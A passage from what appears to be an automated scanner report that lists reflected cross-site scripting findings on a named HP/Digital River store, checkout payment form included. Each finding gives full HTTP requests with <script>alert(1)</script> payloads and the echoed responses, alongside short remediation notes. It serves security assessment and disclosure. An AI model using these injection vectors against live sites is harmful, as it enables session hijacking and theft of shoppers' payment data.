Set-Cookie: ARPT=XVIOVMS10.100.129.43CKMWY; path=/
Date: Thu, 30 Jun 2011 11:50:10 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Set-Cookie: fr_puid=063011_075009951_w4d123106x130e05eab40xw7993; path=/; expires=Sat, 29-Jun-2013 11:50:09 GMT
Set-Cookie: frC=1
Set-Cookie: JSESSIONID=abcliCigb591ta9bOyGdt; path=/
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 4174
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="all_html" lang="en-US">
<head>

<script type="text/java
...[SNIP]...
<script type="text/javascript" language="javascript" src="http://h30415.www3.hp.com/domovoi.jsp;jsessionid=abcliCigb591ta9bOyGdt?nsid=a-4d123106:130e05eab40:-7994&78db3"><script>alert(1)</script>c7cb7310b63=1">
...[SNIP]...

2.9. http://hp.digitalriver.com/store [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hp.digitalriver.com
Path:	/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ea5f6--><script>alert(1)</script>bf67fb5650a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=AddItemToRequisition&Env=BASE&Locale=en_US&SiteID=hpappli&ea5f6--><script>alert(1)</script>bf67fb5650a=1 HTTP/1.1
Host: hp.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://hp.digitalriver.com/store?SiteID=hpappli&Action=DisplayProductDetailsPage&productID=231257200&OfferID=7468710109
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31; ORA_WX_SESSION="10.2.2.18:516-0#0"; JSESSIONID=730A178A040DADA09433BBF2D8444EEB; VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; BIGipServerp-drh-dc2pod8-pool1-active=302121482.516.0000; op638homepagegum=a00c00g00h276um0g631z079b; op638homepageliid=a00c00g00h276um0g631z079b; fcR=http%3A//burp/show/0; op_browser=safari_534.24; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fhp.digitalriver.com%2Fstore%2Fhpappli%2FDisplayHomePage%2F%3F3a310--%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253E458acdd922d%3D1; fcP=C=0&T=1309434815233&DTO=1309434815228&U=1313415981&V=1309434830029; fcPT=http%3A//hp.digitalriver.com/store%3FSiteID%3Dhpappli%26Action%3DDisplayProductDetailsPage%26productID%3D231257200%26OfferID%3D7468710109; fcC=X=C1313415981&Y=1309434830040&FV=10&H=1309434830029&Z=1&E=7371833&F=0&I=1309434833204

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=151155380522,0)
Date: Thu, 30 Jun 2011 11:54:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app83
Content-Length: 85306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script>alert(1)</script>bf67fb5650a=1&id=ServerErrorPage"-->
...[SNIP]...

2.10. http://hp.digitalriver.com/store/hpappli/DisplayHomePage/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hp.digitalriver.com
Path:	/store/hpappli/DisplayHomePage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3a310--><script>alert(1)</script>458acdd922d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/hpappli/DisplayHomePage/?3a310--><script>alert(1)</script>458acdd922d=1 HTTP/1.1
Host: hp.digitalriver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.2.2.19:516-0#0"; path=/
Set-Cookie: JSESSIONID=9426A48925BA271212C510435E5C2770; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E5EB328EFDD37B9CF8; expires=Fri, 29-Jun-2012 17:41:30 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=95320653471,0)
Content-Length: 121069
Date: Thu, 30 Jun 2011 11:52:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app84
Connection: close
Set-Cookie: BIGipServerp-drh-dc2pod8-pool1-active=318898698.516.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script>alert(1)</script>458acdd922d=1&Action=DisplayESIPage&Currency=USD&ESIHC=ce20d349&Env=BASE&Locale=en_US&SiteID=hpappli&StyleID=26380500&StyleVersion=21&ceid=173881400&cename=TopHeader&id=HomePage&script>
...[SNIP]...

2.11. http://hp.digitalriver.com/store/hpappli/DisplayHomePage/www.hp.com/cma/metrics/survey/na_num_clicks.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hp.digitalriver.com
Path:	/store/hpappli/DisplayHomePage/www.hp.com/cma/metrics/survey/na_num_clicks.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 982cc--><script>alert(1)</script>d21d39bf8b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/hpappli/DisplayHomePage/www.hp.com/cma/metrics/survey/na_num_clicks.js?982cc--><script>alert(1)</script>d21d39bf8b0=1 HTTP/1.1
Host: hp.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hp.digitalriver.com/store/hpappli/DisplayHomePage/?3a310--%3E%3Cscript%3Ealert(document.location)%3C/script%3E458acdd922d=1
Cookie: op_browser=mozilla_1.9.2.13; op_browserHigh=mozilla; op_os=windows; RefURL=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; ORA_WX_SESSION="10.2.2.18:516-0#0"; JSESSIONID=730A178A040DADA09433BBF2D8444EEB; VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; BIGipServerp-drh-dc2pod8-pool1-active=302121482.516.0000; op638homepagegum=a00c00g00h276um0fy3kq6981; op638homepageliid=a00c00g00h276um0fy3kq6981; fcC=X=C1422921227&Y=1309434888691&FV=-1&H=1309434888547&Z=0&E=2283193&F=0; fcP=C=0&T=1309434888691&DTO=1309434888547&U=1422921227&V=1309434888547; fcR=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue; fcPT=http%3A//hp.digitalriver.com/store/hpappli/DisplayHomePage/%3F3a310--%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E458acdd922d%3D1; s_depth=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TM;max-age=7200+0;age=1;ecid=121090650673,0)
Date: Thu, 30 Jun 2011 11:55:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app83
Content-Length: 121945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script>alert(1)</script>d21d39bf8b0=1&Action=DisplayESIPage&Currency=USD&ESIHC=ce20d349&Env=BASE&Locale=en_US&SiteID=hpappli&StyleID=26380500&StyleVersion=21&ceid=173881400&cename=TopHeader&id=HomePage&na_num_clicks=js&script>
...[SNIP]...

2.12. http://hp.digitalriver.com/store/hpappli/DisplayHomePage/www8.hp.com/us/en/scripts/baynote.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hp.digitalriver.com
Path:	/store/hpappli/DisplayHomePage/www8.hp.com/us/en/scripts/baynote.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b79bb--><script>alert(1)</script>1d737116ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/hpappli/DisplayHomePage/www8.hp.com/us/en/scripts/baynote.js?b79bb--><script>alert(1)</script>1d737116ac=1 HTTP/1.1
Host: hp.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hp.digitalriver.com/store/hpappli/DisplayHomePage/?3a310--%3E%3Cscript%3Ealert(document.location)%3C/script%3E458acdd922d=1
Cookie: op_browser=mozilla_1.9.2.13; op_browserHigh=mozilla; op_os=windows; RefURL=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; ORA_WX_SESSION="10.2.2.18:516-0#0"; JSESSIONID=730A178A040DADA09433BBF2D8444EEB; VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; BIGipServerp-drh-dc2pod8-pool1-active=302121482.516.0000; op638homepagegum=a00c00g00h276um0fy3kq6981; op638homepageliid=a00c00g00h276um0fy3kq6981; fcC=X=C1422921227&Y=1309434888691&FV=-1&H=1309434888547&Z=0&E=2283193&F=0; fcP=C=0&T=1309434888691&DTO=1309434888547&U=1422921227&V=1309434888547; fcR=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue; fcPT=http%3A//hp.digitalriver.com/store/hpappli/DisplayHomePage/%3F3a310--%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E458acdd922d%3D1; s_depth=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TM;max-age=7200+0;age=1;ecid=22306397762,0)
Date: Thu, 30 Jun 2011 11:55:19 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app83
Content-Length: 121931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script>alert(1)</script>1d737116ac=1&baynote=js&ceid=173881400&cename=TopHeader&id=HomePage&script>
...[SNIP]...

2.13. https://hp.digitalriver.com/DRHM/store [name%24%2456868 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hp.digitalriver.com
Path:	/DRHM/store

Issue detail

The value of the name%24%2456868 request parameter is copied into the HTML document as plain text between tags. The payload 23e37<script>alert(1)</script>aca9a9fc2da48bcd0 was submitted in the name%24%2456868 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /DRHM/store?Action=PostCheckoutPaymentQuickBuyCartPage&SiteID=hpappli&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=QuickBuyCartPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_month=&month=&ORIG_VALUE_day=&day=&ORIG_VALUE_year=&year=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_state=&state=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2456868=-1&paymentMethodID%24%2456868=-1&ORIG_VALUE_name%24%2456868=CreditCardMethod&name%24%2456868=23e37<script>alert(1)</script>aca9a9fc2da48bcd0&ORIG_VALUE_paymentMethodFee%24%2456868=&paymentMethodFee%24%2456868=&ORIG_VALUE_pmtMethodValues%24%2456868=americanExpress%2CcarteBlanche%2CdinersClub%2Cdiscover%2CJCB%2CmasterCard%2Cvisa&pmtMethodValues%24%2456868=americanExpress%2CcarteBlanche%2CdinersClub%2Cdiscover%2CJCB%2CmasterCard%2Cvisa&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=true&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&ORIG_VALUE_tosAccepted=off&x=22&y=8 HTTP/1.1
Host: hp.digitalriver.com
Connection: keep-alive
Referer: https://hp.digitalriver.com/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=hpappli&id=QuickBuyCartPage
Cache-Control: max-age=0
Origin: https://hp.digitalriver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31; ORA_WX_SESSION="10.2.2.18:516-0#0"; JSESSIONID=730A178A040DADA09433BBF2D8444EEB; VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; BIGipServerp-drh-dc2pod8-pool1-active=302121482.516.0000; op638homepagegum=a00c00g00h276um0g631z079b; op638homepageliid=a00c00g00h276um0g631z079b; fcR=http%3A//burp/show/0; op_browser=safari_534.24; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fhp.digitalriver.com%2Fstore%2Fhpappli%2FDisplayHomePage%2F%3F3a310--%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253E458acdd922d%3D1; fcP=C=0&T=1309434815233&DTO=1309434815228&U=1313415981&V=1309434830029; fcPT=http%3A//hp.digitalriver.com/store%3FSiteID%3Dhpappli%26Action%3DDisplayProductDetailsPage%26productID%3D231257200%26OfferID%3D7468710109; fcC=X=C1313415981&Y=1309434830040&FV=10&H=1309434830029&Z=1&E=7371833&F=0&I=1309434833204

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22307081631,0)
Date: Thu, 30 Jun 2011 12:06:27 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app83
Content-Length: 144255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<strong class="dr_paymentOptionItem">23e37<script>alert(1)</script>aca9a9fc2da48bcd0</strong>
...[SNIP]...

2.14. https://hp.digitalriver.com/DRHM/store [name%24%2456868 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hp.digitalriver.com
Path:	/DRHM/store

Issue detail

The value of the name%24%2456868 request parameter is copied into an HTML comment. The payload 5b397--><script>alert(1)</script>ec56db6dbf1574e04 was submitted in the name%24%2456868 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /DRHM/store?Action=PostCheckoutPaymentQuickBuyCartPage&SiteID=hpappli&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=QuickBuyCartPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_month=&month=&ORIG_VALUE_day=&day=&ORIG_VALUE_year=&year=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_state=&state=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2456868=-1&paymentMethodID%24%2456868=-1&ORIG_VALUE_name%24%2456868=CreditCardMethod&name%24%2456868=5b397--><script>alert(1)</script>ec56db6dbf1574e04&ORIG_VALUE_paymentMethodFee%24%2456868=&paymentMethodFee%24%2456868=&ORIG_VALUE_pmtMethodValues%24%2456868=americanExpress%2CcarteBlanche%2CdinersClub%2Cdiscover%2CJCB%2CmasterCard%2Cvisa&pmtMethodValues%24%2456868=americanExpress%2CcarteBlanche%2CdinersClub%2Cdiscover%2CJCB%2CmasterCard%2Cvisa&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=true&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&ORIG_VALUE_tosAccepted=off&x=22&y=8 HTTP/1.1
Host: hp.digitalriver.com
Connection: keep-alive
Referer: https://hp.digitalriver.com/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=hpappli&id=QuickBuyCartPage
Cache-Control: max-age=0
Origin: https://hp.digitalriver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31; ORA_WX_SESSION="10.2.2.18:516-0#0"; JSESSIONID=730A178A040DADA09433BBF2D8444EEB; VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; BIGipServerp-drh-dc2pod8-pool1-active=302121482.516.0000; op638homepagegum=a00c00g00h276um0g631z079b; op638homepageliid=a00c00g00h276um0g631z079b; fcR=http%3A//burp/show/0; op_browser=safari_534.24; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fhp.digitalriver.com%2Fstore%2Fhpappli%2FDisplayHomePage%2F%3F3a310--%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253E458acdd922d%3D1; fcP=C=0&T=1309434815233&DTO=1309434815228&U=1313415981&V=1309434830029; fcPT=http%3A//hp.digitalriver.com/store%3FSiteID%3Dhpappli%26Action%3DDisplayProductDetailsPage%26productID%3D231257200%26OfferID%3D7468710109; fcC=X=C1313415981&Y=1309434830040&FV=10&H=1309434830029&Z=1&E=7371833&F=0&I=1309434833204

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22307085517,0)
Date: Thu, 30 Jun 2011 12:06:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app83
Content-Length: 144305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script>alert(1)</script>ec56db6dbf1574e04RadioSelect -->
...[SNIP]...

2.15. https://hp.digitalriver.com/DRHM/store [name%24%2456868 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hp.digitalriver.com
Path:	/DRHM/store

Issue detail

The value of the name%24%2456868 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccb1c"><script>alert(1)</script>d68ccffc7dd67b65d was submitted in the name%24%2456868 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /DRHM/store?Action=PostCheckoutPaymentQuickBuyCartPage&SiteID=hpappli&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=QuickBuyCartPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_month=&month=&ORIG_VALUE_day=&day=&ORIG_VALUE_year=&year=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_state=&state=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2456868=-1&paymentMethodID%24%2456868=-1&ORIG_VALUE_name%24%2456868=CreditCardMethod&name%24%2456868=ccb1c"><script>alert(1)</script>d68ccffc7dd67b65d&ORIG_VALUE_paymentMethodFee%24%2456868=&paymentMethodFee%24%2456868=&ORIG_VALUE_pmtMethodValues%24%2456868=americanExpress%2CcarteBlanche%2CdinersClub%2Cdiscover%2CJCB%2CmasterCard%2Cvisa&pmtMethodValues%24%2456868=americanExpress%2CcarteBlanche%2CdinersClub%2Cdiscover%2CJCB%2CmasterCard%2Cvisa&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=true&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&ORIG_VALUE_tosAccepted=off&x=22&y=8 HTTP/1.1
Host: hp.digitalriver.com
Connection: keep-alive
Referer: https://hp.digitalriver.com/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=hpappli&id=QuickBuyCartPage
Cache-Control: max-age=0
Origin: https://hp.digitalriver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31; ORA_WX_SESSION="10.2.2.18:516-0#0"; JSESSIONID=730A178A040DADA09433BBF2D8444EEB; VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; BIGipServerp-drh-dc2pod8-pool1-active=302121482.516.0000; op638homepagegum=a00c00g00h276um0g631z079b; op638homepageliid=a00c00g00h276um0g631z079b; fcR=http%3A//burp/show/0; op_browser=safari_534.24; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fhp.digitalriver.com%2Fstore%2Fhpappli%2FDisplayHomePage%2F%3F3a310--%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253E458acdd922d%3D1; fcP=C=0&T=1309434815233&DTO=1309434815228&U=1313415981&V=1309434830029; fcPT=http%3A//hp.digitalriver.com/store%3FSiteID%3Dhpappli%26Action%3DDisplayProductDetailsPage%26productID%3D231257200%26OfferID%3D7468710109; fcC=X=C1313415981&Y=1309434830040&FV=10&H=1309434830029&Z=1&E=7371833&F=0&I=1309434833204

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22307078965,0)
Date: Thu, 30 Jun 2011 12:06:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app83
Content-Length: 144321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<div class="dr_paymentMethodBlock" id="dr_ccb1c"><script>alert(1)</script>d68ccffc7dd67b65d">
...[SNIP]...

